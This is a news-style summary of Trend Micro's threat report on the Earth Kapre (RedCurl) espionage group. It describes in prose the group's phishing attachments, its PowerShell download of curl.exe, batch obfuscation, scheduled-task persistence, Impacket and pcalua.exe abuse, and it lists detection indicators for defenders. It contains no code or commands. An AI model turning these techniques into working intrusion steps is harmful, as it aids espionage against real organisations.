Trend Micro’s Investigation Reveals Earth Kapre’s Evasive Cyber Espionage Techniques

An investigation into a series of cyber espionage activities has been attributed to a threat group tracked as Earth Kapre, also known as RedCurl and Red Wolf. This group, as detailed in Trend Micro's report targets a wide array of countries including Russia, Germany, Ukraine, the UK, Slovenia, Canada, Australia, and the US. Their method of attack involves sending phishing emails that contain malicious attachments in the form of .iso and .img files. When these attachments are opened, they trigger unauthorized data collection and establish communication with command-and-control (C&C) servers.

Central to Earth Kapre's strategy is the exploitation of native Windows tools to infiltrate and maintain their presence within targeted systems. The group initiates its attack chain by using a PowerShell command to download and execute "curl.exe" in the system's directory, facilitating further malicious downloads including the 7-Zip archiving tool. Trend Micro's report highlights an intricate obfuscation technique where attackers use batch files to execute complex commands, complicating the analysis and detection of their activities.

The attackers also ensure their persistence in compromised systems by creating scheduled tasks. Trend Micro's findings include the utilization of Impacket for Server Message Block (SMB) interactions and the exploitation of the Program Compatibility Assistant (pcalua.exe) to indirectly execute malicious commands, showcasing the group's adeptness at bypassing security measures. For cybersecurity detection engineers, key indicators of Earth Kapre's activities to monitor include PowerShell downloads and script executions, usage of "rundll32", evidence of Impacket usage, and the unusual application of "pcalua.exe" for indirect command execution.

Trend Micro's detailed analysis of Earth Kapre's sophisticated methods complements Proofpoint's recent findings on TA577, which also employs phishing campaigns to harvest NTLM authentication data. This convergence highlights a broader trend where such data harvesting could potentially set the stage for malicious SMB activities.